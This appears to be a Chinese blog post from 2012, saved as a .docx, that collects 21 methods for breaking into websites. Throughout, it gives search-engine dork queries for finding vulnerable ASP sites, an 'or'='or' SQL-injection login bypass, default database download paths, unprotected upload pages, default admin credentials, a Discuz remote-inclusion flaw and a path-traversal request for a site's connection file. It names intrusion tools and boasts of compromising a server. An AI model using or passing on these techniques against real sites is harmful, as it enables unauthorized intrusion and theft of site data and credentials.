拿站方法汇总.docxVIP

拿站方法汇总??2012-06-14 12:09:04|??分类：?网站入侵?|??标签：网站入侵??webshell??网络安全??入侵??|字号?订阅1、到Google搜索，site:inurl:asp2、到Google，搜索一些关键字，edit.asp? 韩国肉鸡为多，多数为MSSQL数据库!3、利用挖掘鸡和一个ASP木马：文件名是login.asp……路径组是/manage/关键词是went.asp用’or’=’or’来登陆4、以下这个方法因为太多人做过，所以一些网站管理员对此都有防范之心了，成功率不高:关键字：“Co Net MIB Ver 1.0网站后台管理系统”帐号密码为 ‘or’=’or’5、动感购物系统，呵呵。想到了明小子：inurl:help.asp登陆，如未注册成为会员!upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞。6、默认数据库地址blogdata/acblog.asa关键字：acblog7、百度 /htdocs注册里可以直接上传asa文件！8、/Database/#newasp.mdb关键词：NewAspSiteManageSystem Version9、用挖掘机关键字：Powered by WEBBOY页面：/upfile.asp10、baidu中搜索关键字Ver5.0 Build 0519(存在上传漏洞)11、Upfile_Article.asp bbs/upfile.asp输入关键字：powered by mypower，应该是动什么上传漏洞来着？用的人也比较多估计明小子，挖掘鸡就可以了12、inurl:winnt\system32\inetsrv\在google里面输入这个就可以找到很多网站13、现在GOOGLE搜索关键字intitle:网站小助手　inurl:asp14、关键字：首页最新动态新手指南舞曲音乐下载中心经典文章玩家风采装备购买站内流言友情连接本站论坛挖掘鸡的关键字添 setup.asp15、VBulletin论坛的数据库默认数据库地址!/includes/functions.php工具:1)网站猎手。下载地址：百度 Google!2)Google关键字:Powered by: vBulletin Version 3.0.1Powered by: vBulletin Version 3.0.2Powered by: vBulletin Version 3.0.3其中一个就可以了161)打开百度或GOOGLE搜索，输入powered by comersus ASP shopping cartopen source。这是一个商场系统。2)网站的最底部分，有个Comersus Open Technologies LC。打开看下~~comersus系统~猜到，comersus.mdb. 是数据库名数据库都是放在database/ 后的，所以database/comersus.mdbcomersus_listCategoriesTree.asp换成database/comersus.mdb，不能下载。那样把前一个’’store/”除去，再加上database/comersus.mdb 试试都是默认数据库地址17、无忧传奇官方站点程序。1)后台管理地址：http://您的域名/msmiradmin/或者是 http://您的域名/admin.asp2)默认后台管理帐号：msmir3)默认后台管理密码：msmirmsmir或msmir数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb或者是 http://您的域名/msmirdata/msmirArticle.asa数据库连接文件为 ***********/Conn.asp也是默认数据库地址。现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`18、百度里输入/skins/default/19、利用挖掘机关键机:power by Discuz路径:/wish.php配合:Discuz!论坛wish.php远程包含漏洞……20、上传漏洞.工具 : 当然还是明小子了网站猎手或者挖掘鸡了。关键字powered by mypower检测的页面或文件插入upfile_photo.asp这个用的人也N多。。21、新云漏洞这个漏洞ACCESS和SQL版通吃。Google搜索关键字 “关于本站 – 网站帮助 – 广告合作 – 下载声明 – 友情连接 – 网站地图 – 管理登录”把flash/downfile.asp?url=uploadfile//conn.asp提交到网站根目录。就可以下载conn.asp以源码，软件等下载站居多。大家时常碰到数据库如果前面或者中间+了#